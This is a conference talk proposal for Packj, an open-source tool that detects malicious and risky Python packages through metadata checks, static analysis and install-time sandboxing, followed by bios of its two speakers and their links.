Description:

This talk presents an open-source Python tool, called Packj, for developers and security researchers to detect and report malicious/vulnerable Python packages. Packj started as an academic research project and carries out deep code as well as metadata analyses to detect supply-chain threats.

For instance, it scans package metadata (e.g., Readme, package description) to know whether a package is dummy/typo-squatted/troll. It flags unmaintained or deprecated packages by checking version history and release time gaps. Packages with no public availability of source code repo and lack of two-factor authentication (2FA) are marked as risky. Finally, it performs static code analysis and install-time filesystem/network sandboxing to detect and block suspicious programmatic behaviour, such as the use of sensitive file system and network APIs, which are typically abused to exfiltrate private data,

Packj is available as a standalone CLI tool as well as has support for CI/CD integration. We have built a large-scale automated system for continuous vetting of packages using Packj, and have already identified several malicious packages. In this talk, we will present the technical details, highlight our findings as well as different types of attacks, and demo our tool.

Prerequisites:

No prerequisites are required, but having a basic understanding of Python is good.

Content URLs:

https://github.com/ossillate-inc/packj

Speaker Info:

Speaker: Shiva is a Software intern at Ossillate Inc and an undergrad student with a Bachelor of Technology in Computer Science. He is passionate about Technology and new trends in the software industry. He is interested in DevSecOps, Open-source, and developing things that are helpful for others. Most recently, Shiva has been contributing to Packj, an open-source tool to mitigate software supply-chain attacks

Co-speaker: Ashish is a published author and researcher with a PhD in Computer Science from the Georgia Institute of Technology and extensive experience in building secure systems software from the ground up. He has worked in the industry for over a decade, coupled with nearly a decade of top-tier academic research. Ashish has presented his work at top-tier academic conferences, such as USENIX ATC, ACM SIGMETRICS, NDSS, and CSS. He also frequently speaks at premier industry conferences as well, such as Open Source Summit, PyCon, Linux Plumbers Conference, BlackHAT, and PackagingCon.

Speaker Links:

Speaker: LinkedIn: https://www.linkedin.com/in/shivaabhishek71/ Twitter(X): https://twitter.com/shivaabhishek71

Co-speaker: LinkedIn: https://www.linkedin.com/in/ashishbijlani/ Twitter(X): https://twitter.com/ashishbijlani